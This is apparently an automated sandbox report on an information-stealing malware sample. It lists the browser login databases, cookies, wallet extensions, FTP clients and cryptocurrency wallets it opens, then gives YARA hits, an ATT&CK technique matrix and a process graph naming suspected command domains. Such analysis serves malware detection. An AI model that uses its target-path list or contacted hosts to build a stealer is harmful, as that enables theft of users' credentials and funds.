                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6960, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Bypass.exe PID: 7004, type: MEMORYSTR
                      Source: Yara matchFile source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.1821021197.00000000007F2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.1818779277.0000021DBAF50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 572stuOQ0pZG2Xj.exe PID: 6792, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information12
                      Scripting
                      Valid Accounts141
                      Windows Management Instrumentation
                      12
                      Scripting
                      1
                      Exploitation for Privilege Escalation
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      111
                      Deobfuscate/Decode Files or Information
                      LSASS Memory12
                      File and Directory Discovery
                      Remote Desktop Protocol41
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts12
                      Command and Scripting Interpreter
                      1
                      Registry Run Keys / Startup Folder
                      412
                      Process Injection
                      3
                      Obfuscated Files or Information
                      Security Account Manager157
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Screen Capture
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      PowerShell
                      1
                      Services File Permissions Weakness
                      1
                      Registry Run Keys / Startup Folder
                      11
                      Software Packing
                      NTDS461
                      Security Software Discovery
                      Distributed Component Object Model3
                      Clipboard Data
                      114
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Services File Permissions Weakness
                      1
                      DLL Side-Loading
                      LSA Secrets2
                      Process Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Modify Registry
                      Cached Domain Credentials351
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items351
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
                      Process Injection
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Services File Permissions Weakness
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1461211 Sample: bFZYRLnRIz.exe Startdate: 23/06/2024 Architecture: WINDOWS Score: 100 57 ck66916.tw1.ru 2->57 59 backcreammykiel.shop 2->59 61 ipinfo.io 2->61 83 Snort IDS alert for network traffic 2->83 85 Multi AV Scanner detection for domain / URL 2->85 87 Found malware configuration 2->87 89 16 other signatures 2->89 10 bFZYRLnRIz.exe 13 2->10         started        signatures3 process4 file5 41 C:\Users\user\AppData\Local\...\Loader.exe, PE32 10->41 dropped 43 C:\Users\user\AppData\...\572stuOQ0pZG2Xj.exe, PE32+ 10->43 dropped 45 C:\Users\user\AppData\...\vO7REz65fRBWcJa.vbs, ASCII 10->45 dropped 47 C:\Users\user\...\AntiCheatBypasss.bat, Unicode 10->47 dropped 13 cmd.exe 1 10->13         started        process6 signatures7 103 Uses cmd line tools excessively to alter registry or file data 13->103 105 Adds a directory exclusion to Windows Defender 13->105 16 cmd.exe 3 2 13->16         started        19 conhost.exe 13->19         started        21 cacls.exe 1 13->21         started        process8 signatures9 63 Uses cmd line tools excessively to alter registry or file data 16->63 65 Adds a directory exclusion to Windows Defender 16->65 23 Loader.exe 16->23         started        26 572stuOQ0pZG2Xj.exe 5 16->26         started        29 powershell.exe 23 16->29         started        31 5 other processes 16->31 process10 file11 91 Multi AV Scanner detection for dropped file 23->91 93 Machine Learning detection for dropped file 23->93 95 Contains functionality to inject code into remote processes 23->95 101 3 other signatures 23->101 33 RegAsm.exe 23->33         started        49 C:\ProgramData\...\Bypass.exe, PE32 26->49 dropped 37 Bypass.exe 26->37         started        97 